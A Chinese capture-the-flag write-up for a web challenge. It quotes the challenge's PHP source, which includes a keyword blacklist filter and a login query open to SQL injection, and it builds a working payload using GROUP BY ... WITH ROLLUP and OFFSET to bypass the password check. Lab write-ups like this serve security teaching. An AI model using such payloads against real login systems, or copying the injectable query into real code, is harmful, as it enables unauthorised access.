实验吧——因缺思汀的绕过(sql with rollup)

题目地址：http://ctf5.shiyanbar.com/web/pcat/index.php

 

通读源码，得知出flag的条件

1.需要post提交uname以及pwd，否则直接die了

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

 

2.所提交的数据不能包含以下所有关键字(and|select|from|where|union|join|sleep|benchmark|,|\(|\))，否则exit；

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水可载舟，亦可赛艇！";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

 

3.通过sql查询必须得到一条数据，且数据库中的pwd字段要和post传递的pwd相等

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }
}else{
    print "一颗赛艇！";
}

 

也就是如果我们同时知道数据库中的uname和pwd的话就可以通过，可问题是我们并不知道，所以就需要进行注入，自行构造。

mysql中的with rollup是用来在分组统计数据的基础上再进行统计汇总，即用来得到group by的汇总信息；

看到有些信息汇总后是NULL，我想要pwd变成NULL，提交的pwd也填空，由此便可以构造

uname：  ' or 1 group by pwd with rollup limit 1#

pwd：    （空的）

后台的语句便是

SELECT * FROM interest WHERE uname = '' or 1 group by pwd with rollup limit 1#'

即为

SELECT * FROM interest WHERE uname = ' ' or 1 group by pwd with rollup limit 1

 

可是看到并没有绕过，为什么呢？

我猜想数据库的数据应该是这样的

我们sql语句执行的结果就应是这样的

因为limit 1默认就返回第一条，而我们当然需要的是第三条（此时并不知道服务器上有几条，所以应该自己慢慢测试），所以

这样子我们post的pwd是空，sql查询返回的pwd是NULL（空）,自然相等了，于是构造

uname：  ' or 1 group by pwd with rollup limit 1 offset 2#

pwd：    （空的）